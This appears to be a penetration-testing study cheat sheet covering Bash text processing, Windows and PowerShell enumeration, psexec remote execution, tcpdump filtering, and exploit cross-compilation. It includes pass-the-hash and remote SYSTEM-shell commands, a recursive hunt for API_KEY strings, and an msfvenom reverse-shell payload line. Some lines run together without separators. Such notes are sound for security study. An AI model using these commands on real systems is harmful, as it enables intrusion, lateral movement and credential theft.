-
Bash Environment
echo $PATH
env
history
!1
systemctl restart apache2
!!
-
Piping
cat error.txt | wc -m > count.txt
-
Text Search
-
grep
ls -la /usr/bin | grep zip
-
sed
echo "I need to try hard" | sed 's/hard/harder/'
-
cut
echo "I hack binaries,web apps,mobile apps, and just about anything else" | cut -f 2 -d ","
-
awk
echo "hello::there::friend" | awk -F "::" '{print $1, $3}'
-
-
Editing Files
- nano
- vi
-
Comparing Files
comm
diff
vimdiff
-
Managing Process
ping -c 400 localhost > ping_results.txt &
jobs
fg %1
ps -ef
ps -fC leafpad
kill
-
Command Monitoring
tail -f
watch -n 5 w
-
Downloading Files
wget
curl
axel
-
Customizing Bash
HISTCONTROL
alias
unalias
cat ~/.bashrc
-
cat
cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'
cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap"
-
grep
grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1
-
for
for ip in $(cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png; done
for url in $(cat list.txt); do host $url; done
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
for i in {1..10}; do echo 10.11.1.$i; done
for ip in $(seq 1 10); do echo 10.11.1.$ip; done
- Basic Commands
-
Information Gathering
arp -acmdkey /listdism /online /get-features | moreipconfig /allipconfig /displaydnsnet accounts /domainnet group "Domain Admins" /domainnet group "Domain Controllers" /domainnet group /domainnet localgroup "Administrators"net localgroup "Administrators" user /addnet sharenetsh interface ip show interfacesnetstat –naonslookup IP
-
Copy & execute program on remote host
psexec /accepteula \\IP -c C:\Tools\program.exe -u DOMAIN\USER -p PASS
-
Install software on remote host
psexec /accepteula \\IP -i -s "msiexe.exe /i setup.msi" -c setup.msi
-
Enable Powershell on remote host silently
psexec /accepteula \\IP -s c:\Windows\System32\winrm.cmd quickconfig -quiet 2>&1> $null
-
Run command as system on remote host
psexec /accepteula \\IP -s cmd.exe
-
Pass the hash run remote command
psexec /accepteula \\IP -u DOMAIN\USER -p LM:NTLM cmd.exe /c dir c:\file.exe
-
Execute file on remote system
psexec /accepteula \\IP -u DOMAIN\USER -p PASS -c -f \\IP_2\share\file.exe
-
Run file as specified user
runas /user:USER "file.exe"
-
SC create a remote service on host
sc \\IP create SERVICE
-
Query brief status of all services
sc query
-
Query brief status of all services on remote host
sc query \\IP
-
-
Basic Commands
- Information Gathering
Verb-noun
Get-Help COMMAND-NAME
Get-Help Get-Command -Examples
Get-Command Verb-*
Get-Command *-noun
Verb-Noun | Get-Member
Get-Command | Get-Member -MemberType Method
Get-ChildItem | Select-Object -Property Name
Verb-Noun | Where-Object -Property PropertyName -operator Value
Get-Service | Where-Object -Property Status -eq Stopped
Get-ChildItem | Sort-Object
Get-ChildItem -Path C:\ -Include *interesting-file.txt* -File -Recurse -ErrorAction SilentlyContinue
- Information Gathering
-
Enumeration
- Enumeration
Get-Acl c:/
Get-ScheduledTask -TaskName new-sched-task
Get-Process
Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY
Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue
Get-ComputerInfo
Get-Hotfix -Id KB4023834
Get-Hotfix | measure
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
Get-NetIPAddress
Get-LocalGroup | measure
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
Get-LocalUser | Get-Member
Get-LocalUser -SID "S-1-5-21-"
- Enumeration
-
Application
- HTTP, SMTP...
- Accepts communication requests from applications
- HTTP, SMTP...
-
Presentation
- WMV, JPEG, MOV...
- Transforms data into the given format
- WMV, JPEG, MOV...
-
Session
- Session management
- Tracks communication between the host and the receiver
- Session management
-
Transport
-
TCP
- Segments
-
UDP
- Datagrams
-
-
Network
- IP Address, Routing...
- Logical addressing
- IP Address, Routing...
-
Data Link
- Switching, Mac Address...
- Checks received packets
- Data formatted for transmission
- Switching, Mac Address...
-
Physical
- Cables
- Transmits/receives data
- Cables
-
Follow = TCP Stream / UDP Stream
-
Frame 1
- This is showing details from the physical layer
- The size, in bytes, of the packet received
-
Ethernet II
- This is showing details from the Data Link layer
- The transmission medium, source and destination MAC addresses of the request.
-
Internet Protocol Version 4
- This is showing details from the Network layer
- The source and destination IP addresses of the request.
-
Transmission Control Protocol
- This is showing details from the Transport layer
- Protocol, etc
-
Hypertext Transfer Protocol / Domain Name System / etc
- This is showing details from the Application layer
- HTTP GET request
tcpdump -r password_cracking_filtered.pcap
tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3 }' | sort | uniq -c | head
tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
tcpdump -n port 81 -r password_cracking_filtered.pcap
tcpdump -nX -r password_cracking_filtered.pcap
-
Cross Compiling Exploit Code
apt install mingw-w64i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exei686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT EXITFUNC= thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d"
-
Cross Compile to Windows from Linux
- Compile a 32-bit program with a 64-bit gcc
sudo apt-get install g++-multilib
sudo apt-get install gcc-multilib
gcc -m32 -Wl,--hash-style=both exploit.c -o exploit
- Compile a 32-bit program with a 64-bit gcc